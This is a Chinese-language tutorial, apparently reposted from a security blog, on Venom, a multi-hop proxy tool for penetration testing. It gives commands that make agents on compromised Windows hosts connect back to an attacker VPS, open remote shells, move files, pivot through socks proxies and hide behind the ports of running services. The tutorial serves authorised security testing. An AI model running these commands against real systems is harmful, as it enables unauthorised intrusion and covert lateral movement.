【渗透工具】内网多级代理工具Venom详细使用教程

免责申明

本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

简介

Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。

Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。

渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。

使用

使用案例

最终效果需要在kali上运行服务端,在win7上建立第一个节点,在win10上建立第二个节点,如有多级代理一次类推

venmo文件目录

VPS以本地kali为例,执行命令,获取相关命令帮助

./admin_linux_x64 

在这里插入图片描述

Venom version: 1.1Usage:$ ./venom_admin -lport [port]$ ./venom_admin -rhost [ip] -rport [port]Options:-lport portListen a local port.  //设置监听端口-passwd passwordThe password used in encrypted communication. (optional)  //设置密码-rhost ipRemote ip address.  //连接端口-rport portThe port on remote host.  //连接地址

创建一级节点

在kali 服务器上执行:

./admin_linux_x64 -lport 12138 -passwd xiaoc

在这里插入图片描述

实际环境中通过获取win7的权限,将venom的agent 工具上传到win7
执行如下命令:

admin.exe -rhost VPS_ip -rport 12138 -passwd xiaoc

admin节点和agent节点均可监听连接也可发起连接

admin监听端口,agent发起连接:./admin_linux_x64 -lport 9999  -passwd xiaoc
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999 -passwd xiaocagent监听端口,admin发起连接:./agent_linux_x64 -lport 8888  -passwd xiaoc
./admin_linux_x64 -rhost 192.168.204.139 -rport 8888  -passwd xiaoc

执行完命令后,第一个节点上线,可以使用show获取当前拓扑
在这里插入图片描述
获取节点后支持的命令如下:

  help                                     Help information.exit                                     Exit.show                                     Display network topology.getdes                                   View description of the target node.setdes     [info]                        Add a description to the target node.goto       [id]                          Select id as the target node.listen     [lport]                       Listen on a port on the target node.connect    [rhost] [rport]               Connect to a new node through the target node.sshconnect [user@ip:port] [dport]        Connect to a new node through ssh tunnel.shell                                    Start an interactive shell on the target node.upload     [local_file]  [remote_file]   Upload files to the target node.download   [remote_file]  [local_file]   Download files from the target node.socks      [lport]                       Start a socks5 server.lforward   [lhost] [sport] [dport]       Forward a local sport to a remote dport.rforward   [rhost] [sport] [dport]       Forward a remote sport to a local dport.

在这里插入图片描述

例如使用shell命令
使用goto 1进入第一个节点,使用shell执行ipconfig命令
在这里插入图片描述
在实际攻防中会经常用到socks代理,例如
在这里插入图片描述
设置socke代理成功后可通过在浏览器配置代理或者配置proxychains4工具访问其他端口服务

创建第二个节点

创建好第一个节点后,通过渗透获取第二节点的win10服务器权限

在kali端进入第一个节点

监听8787端口

listen 8787

在这里插入图片描述

将agent工具上传到win10服务器,执行命令

agent.exe -rhost 10.168.2.20 -rport 8787 -passwd xiaoc

在这里插入图片描述
第二个节点上线成功
在这里插入图片描述
在这里插入图片描述

agent节点支持端口复用

agent提供了两种端口复用方法

  1. 通过SO_REUSEPORT和SO_REUSEADDR选项进行端口复用
  2. 通过iptables进行端口复用(仅支持Linux平台)

通过venom提供的端口复用功能,在windows上可以复用apache、mysql等服务的端口,暂时无法复用RDP、IIS等服务端口,在linux上可以复用多数服务端口。被复用的端口仍可正常对外提供其原有服务。

第一种端口复用方法

# 以windows下apache为例
# 复用apache 80端口,不影响apache提供正常的http服务
# -lhost 的值为本机ip,不能写0.0.0.0,否则无法进行端口复用
./agent.exe -lhost 192.168.204.139 -reuse-port 80
./admin_macos_x64 -rhost 192.168.204.139 -rport 80

第二种端口复用方法

# 以linux下apache为例
# 需要root权限
sudo ./agent_linux_x64 -lport 8080 -reuse-port 80

这种端口复用方法会在本机设置iptables规则,将reuse-port的流量转发到lport,再由agent分发流量

需要注意一点,如果通过sigterm,sigint信号结束程序(kill或ctrl-c),程序可以自动清理iptables规则。如果agent被kill -9杀掉则无法自动清理iptables规则,需要手动清理,因为agent程序无法处理sigkill信号。

为了避免iptables规则不能自动被清理导致渗透测试者无法访问80端口服务,所以第二种端口复用方法采用了iptables -m recent通过特殊的tcp包控制iptables转发规则是否开启。

这里的实现参考了 https://threathunter.org/topic/594545184ea5b2f5516e2033

# 启动agent在linux主机上设置的iptables规则
# 如果rhost在内网,可以使用socks5代理脚本流量,socks5代理的使用见下文
python scripts/port_reuse.py --start --rhost 192.168.204.135 --rport 80# 连接agent节点
./admin_macos_x64 -rhost 192.168.204.135 -rport 80# 如果要关闭转发规则
python scripts/port_reuse.py --stop --rhost 192.168.204.135 --rport 80

节点间通信加密

Venom提供节点间通信加密功能,用户可通过-passwd选项指定密码,该密码用于生成AES加密所需的密钥。

# 通过-passwd指定密码为dlive@dubhe
./admin_macos_x64 -lport 8889 -passwd dlive@dubhe# agent指定相同的密码与admin节点连接
./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe

下载链接

关注公众号回复“20240628”获取下载链接

关注公众号

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/37038.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【LeetCode】九、双指针算法:环形链表检测 + 救生艇

文章目录 1、双指针算法1.1 对撞双指针1.2 快慢双指针 2、leetcode141:环形链表3、leetcode881:救生艇 1、双指针算法 用两个指针来共同解决一个问题: 1.1 对撞双指针 比如先有一个有序的数组array int[] array {1, 4, 5, 7, 9}先要找两个…

什么是产线工控安全,如何保障产线设备的安全

什么是产线工控安全? 工控,指的是工业自动化控制,主要利用电子电气、机械、软件组合实现。即是工业控制系统,或者是工厂自动化控制。产线工控安全指的是工业控制系统的数据、网络和系统安全。随着工业信息化的迅猛发展&#xff0…

如何利用“AI交互数字人+展厅”拓展文娱消费空间?

打造新生代潮玩聚集地,打造演艺新空间,促进虚拟现实体验等文娱业态场景创新,成为了当下发展文旅消费新场景的一大重要手段。数字人汇集了虚拟现实、增强现实、全息投影、人工智能、实时传输语音合成等数字技术,可以利用数字人重构…

SpringBoot项目中获取IP地址

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 OkHttp 是一个由 Square 开发的高效、现代的 HTTP 客户端库,用于 Android 和 Java 应用程序。它支持 HTTP/2 和 SPDY 等现代网络协议,…

Jmeter 进行http接口测试

🍅 视频学习:文末有免费的配套视频可观看 🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 本文主要针对http接口进行测试,使用 jmeter工具实现。 Jmeter工具设计之初是用于做性…

如何用Vue3和Plotly.js绘制动态3D图表?

本文由ScriptEcho平台提供技术支持 项目地址:传送门 Plotly.js: 使用Vue.js动态加载数据并绘制图表 应用场景 在数据可视化应用中,需要将数据动态加载到图表中并进行实时更新。本文将展示如何使用Plotly.js和Vue.js实现这一功能,从加载外…

MobPush iOS端海外推送最佳实现

推送注册 在AppDelegate里进行SDK初始化&#xff08;也可以在Info.plist文件中进行AppKey&#xff0c;AppSecret的配置&#xff09;并对通知功能进行注册以及设置推送的环境和切换海外服务器等&#xff0c;参考如下步骤代码&#xff1a; <span style"background-colo…

【深度学习】图形模型基础(1):使用潜在变量模型进行数据分析的box循环

1.绪论 探索数据背后的隐藏规律&#xff0c;这不仅是数据分析的艺术&#xff0c;更是概率模型展现其威力的舞台。在这一过程中&#xff0c;潜在变量模型尤为关键&#xff0c;它成为了数据驱动问题解决的核心引擎。潜在变量模型的基本理念在于&#xff0c;那些看似复杂、杂乱无…

又是一篇关于GD32堆栈的梳理+FreeRTOS的空间

GD32F103CB&#xff1a;SRAM 20K&#xff08;0x5000&#xff09; 这篇文章主要想讲清楚几个事情&#xff1a; 1、启动文件Stack_Size、Heap_Size的大小设置有啥影响&#xff1b; 2、FreeRTOS的内存&#xff1a;FreeRTOSConfig.h文件configTOTAL_HEAP_SIZE&#xff1b; 问题2…

讯飞星火V4.0 发布,全面对标GPT-4 Turbo

6月27日&#xff0c;讯飞星火V4.0如期而至&#xff0c;升级成为更懂你的AI助手。 七大核心能力持续突破&#xff0c;全面对标GPT-4 Turbo。在8个国际主流测试集中排名第一&#xff0c;讯飞星火以一份惹眼的成绩单&#xff0c;成为国内大模型的先行者。 发布会现场&#xff0c…

用数组模拟栈实现递归函数模拟

做算法课设时候看到题目要求模拟函数递归时候栈的入栈出栈过程。本来想着直接调用系统递归函数即可&#xff0c;可是发现系统函数栈的空间非常小大约只有3000层&#xff0c;很容易爆栈。于是便有了用栈去模拟递归函数的想法&#xff0c;但是上网查了下貌似相关代码比较少&#…

小马搬运物品-第13届蓝桥杯省赛Python真题精选

[导读]&#xff1a;超平老师的Scratch蓝桥杯真题解读系列在推出之后&#xff0c;受到了广大老师和家长的好评&#xff0c;非常感谢各位的认可和厚爱。作为回馈&#xff0c;超平老师计划推出《Python蓝桥杯真题解析100讲》&#xff0c;这是解读系列的第89讲。 小马搬运物品&…

如何与Honda建立EDI连接?

你是本田Honda的新供应商&#xff0c;需要具备EDI电子数据交换功能吗&#xff1f;在与本田Honda交换EDI消息时需要帮助吗&#xff1f;本文将带你快速了解Honda的EDI需求&#xff0c;明确EDI对接需要完成的工作。 项目背景 本田是一家世界领先的汽车制造商&#xff0c;在全球2…

仓库选址问题【数学规划的应用(含代码)】阿里达院MindOpt

本文主要讲述使用MindOpt工具优化仓库选址的数学规划问题。 视频讲解&#x1f448;&#x1f448;&#x1f448;&#x1f448;&#x1f448;&#x1f448;&#x1f448;&#x1f448;&#x1f448; 一、案例场景 仓库选址问题在现代物流和供应链管理中具有重要的应用。因为仓库…

《数据结构与算法基础 by王卓老师》学习笔记——2.2线性表的案例引入

案例一&#xff1a;一元多项式的运算 案例二&#xff1a;稀疏多项式的运算 案例三&#xff1a;图书信息管理系统 总结

【Leetcode】520. 检测大写字母

文章目录 题目思路代码复杂度分析时间复杂度空间复杂度 结果总结 题目 题目链接&#x1f517;我们定义&#xff0c;在以下情况时&#xff0c;单词的大写用法是正确的&#xff1a; 全部字母都是大写&#xff0c;比如 “USA” 。单词中所有字母都不是大写&#xff0c;比如 “le…

同心创建 共践食安 | 赵梦澈荣获食品安全大使

“民族要复兴&#xff0c;乡村必振兴”&#xff0c;为深入贯彻落实国家乡村振兴战略&#xff0c;推进乡村全面振兴不断取得新成效&#xff0c;助力全国优质食品农产品的宣传推广、市场营销、品牌创建工作&#xff0c;由中国食品安全报社主办&#xff0c;商业发展中心、健康中国…

python数据分析与可视化一

公共部分 # 引入数据分析工具 Pandas import pandas as pd # 引入数据可视化工具 Matplotlib import matplotlib.pyplot as plt # 引入数据可视化工具 Seaborn (基于matplotlib) import seaborn as sns # 解决输出时的列名对齐问题 pd.set_option(display.unicode.east_…

如何申请免费SSL证书以消除访问网站显示连接不安全提醒

在当今互联网时代&#xff0c;网络安全已成为一个不可忽视的问题。当用户浏览一些网站时&#xff0c;有时会看到浏览器地址栏出现“不安全”的提示&#xff0c;这意味着该网站没有安装SSL证书&#xff0c;数据传输可能存在风险。那么&#xff0c;如何消除这种不安全提醒&#x…

仓库管理系统16--入库管理

原创不易&#xff0c;打字不易&#xff0c;截图不易&#xff0c;多多点赞&#xff0c;送人玫瑰&#xff0c;留有余香&#xff0c;财务自由明日实现。 1、创建物资入库用户控件 <UserControl x:Class"West.StoreMgr.View.InStoreView"xmlns"http://schema…